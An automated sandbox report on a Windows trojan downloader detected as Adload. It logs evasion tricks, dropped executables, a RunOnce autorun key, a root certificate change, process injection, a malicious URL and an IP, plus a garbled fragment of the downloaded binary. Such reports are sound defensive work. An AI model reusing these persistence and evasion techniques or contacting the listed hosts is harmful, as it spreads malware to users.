NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ff7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ff8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ff9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93eeb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

A process attempted to delay the analysis task. (1 event)

description

Lyshusazhitae.exe tried to sleep 202 seconds, actually delayed analysis time by 202 seconds

Creates executable files on the filesystem (6 events)

file	C:\Program Files (x86)\Microsoft SQL Server\Taexelupeqo.exe
file	C:\Users\test22\AppData\Local\Temp\is-5Q4M8.tmp\idp.dll
file	C:\Users\test22\AppData\Local\Temp\is-5Q4M8.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-5Q4M8.tmp\PowerOff.exe
file	C:\Users\test22\AppData\Local\Temp\ed-e0dc9-70f-6739a-d042ac606a444\Lyshusazhitae.exe
file	C:\Users\test22\AppData\Local\Temp\3a-51b55-b43-4a28d-3a13d327ec8e4\Rufifitajy.exe

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\Temp\3a-51b55-b43-4a28d-3a13d327ec8e4\Rufifitajy.exe
file	C:\Users\test22\AppData\Local\Temp\ed-e0dc9-70f-6739a-d042ac606a444\Lyshusazhitae.exe

Drops an executable to the user AppData folder (6 events)

file	C:\Users\test22\AppData\Local\Temp\3a-51b55-b43-4a28d-3a13d327ec8e4\Rufifitajy.exe
file	C:\Users\test22\AppData\Local\Temp\is-5Q4M8.tmp\PowerOff.exe
file	C:\Users\test22\AppData\Local\Temp\ed-e0dc9-70f-6739a-d042ac606a444\Lyshusazhitae.exe
file	C:\Users\test22\AppData\Local\Temp\is-5Q4M8.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-5Q4M8.tmp\idp.dll
file	C:\Users\test22\AppData\Local\Temp\is-CGK7S.tmp\Bolt.tmp

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Nov. 3, 2022, 9:52 a.m.	process_identifier: 1664 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x046a0000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Nov. 3, 2022, 9:51 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process bolt.tmp (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Nov. 3, 2022, 9:51 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL Èªà"0`¢. @ @ @Ô~W H.text4_ ` `.rsrc b@@.reloc @BH¸Õ©,²4úõQëíí´óã´÷£PòÎRÖKýÑ_¨Á[TÕ½å(ô4UóG1ð ©ºé¥õQS ó>EjKåyÏy²à+pqÂB,ñTh¶¦¼xB©SPúN Ø[~¯É;â>Øþ6åÍ~2øðCt¾L{"RîÑy°3uæZ¾«bÜºeKcF«`iÎd×4)P¿¶$okÏÏx¡¬õ?ë^Jè:hGïß+úz»ò \|ÐÐJ¶õ_0õ¬[xSæ±éEhåÉÆVòÆÃm)ît0ìÑ²øm#g;D9#Ûè-ï=.¨¡axåZÞgÁàSB^À{*Åkæ%s9ðÐþ\|µÿ«{¦Â»½Qª<ÊùwyáÍòy:`©h^_åò¿ýìÞè]\&ÅåM¯hõ`ê£tÆ[dvúô7¶yiTý§ØÀf·æèàË«UìöÌÑ-¬Ý>å-}æÊ uµ request_handle: 0x00cc000c	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2156 CREDAT:145409
cmdline	C:\Program Files (x86)\Internet Explorer\iexplore.exe https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6

Communicates with host for which no DNS query was performed (1 event)

host

95.214.24.96

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Nov. 3, 2022, 9:45 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover

reg_value

"C:\Program Files (x86)\Microsoft SQL Server\Taexelupeqo.exe"

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network activity contains more than one unique useragent (2 events)

process	Bolt.tmp				useragent	InnoDownloadPlugin/1.5
process	iexplore.exe				useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2156 resumed a thread in remote process 1664
NtResumeThread Nov. 3, 2022, 9:52 a.m.	thread_handle: 0x00000360 suspend_count: 1 process_identifier: 1664	1	0	0

Generates some ICMP traffic

File has been identified by 45 AntiVirus engines on VirusTotal as malicious (45 events)

Bkav	W32.AIDetect.malware2
Lionic	Trojan.Win32.Adload.a!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.63282927
ALYac	Trojan.GenericKD.63282927
Cylance	Unsafe
Sangfor	Downloader.Win32.AdLoad.Vksq
K7AntiVirus	Trojan-Downloader ( 00599e201 )
Alibaba	AdWare:Win32/AdLoad.355f6f2e
Cybereason	malicious.86742a
Arcabit	Trojan.Generic.D3C59EEF
Symantec	Trojan.Gen.MBT
ESET-NOD32	a variant of Win32/TrojanDownloader.Adload.NVT
APEX	Malicious
Paloalto	generic.ml
Kaspersky	Trojan-Downloader.Win32.Adload.scty
BitDefender	Trojan.GenericKD.63282927
Avast	FileRepMalware [Misc]
Ad-Aware	Trojan.GenericKD.63282927
Emsisoft	Trojan.GenericKD.63282927 (B)
TrendMicro	Trojan.Win32.PRIVATELOADER.YXCKAZ
McAfee-GW-Edition	BehavesLike.Win32.AdwareFileTour.fc
FireEye	Trojan.GenericKD.63282927
Sophos	Mal/Generic-S
Google	Detected
Avira	HEUR/AGEN.1233171
MAX	malware (ai score=99)
Antiy-AVL	Trojan/Generic.ASSuf.577FC
Kingsoft	Win32.Troj.Undef.(kcloud)
Gridinsoft	Trojan.Win32.Downloader.sa
Microsoft	Trojan:Script/Phonzy.A!ml
SUPERAntiSpyware	Backdoor.Manuscrypt/Variant
GData	Trojan.GenericKD.63282927
Cynet	Malicious (score: 99)
AhnLab-V3	Trojan/Win.Generic.C4501722
McAfee	Artemis!AA290CFE7546
Malwarebytes	Trojan.Downloader
TrendMicro-HouseCall	Trojan.Win32.PRIVATELOADER.YXCKAZ
Tencent	Win32.Trojan-Downloader.Adload.Qcnw
Ikarus	Trojan-Downloader.Win32.Adload
MaxSecure	Trojan.Malware.118513902.susgen
Fortinet	W32/PossibleThreat
AVG	FileRepMalware [Misc]
Panda	Trj/CI.A
CrowdStrike	win/malicious_confidence_100% (W)

Bolt.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All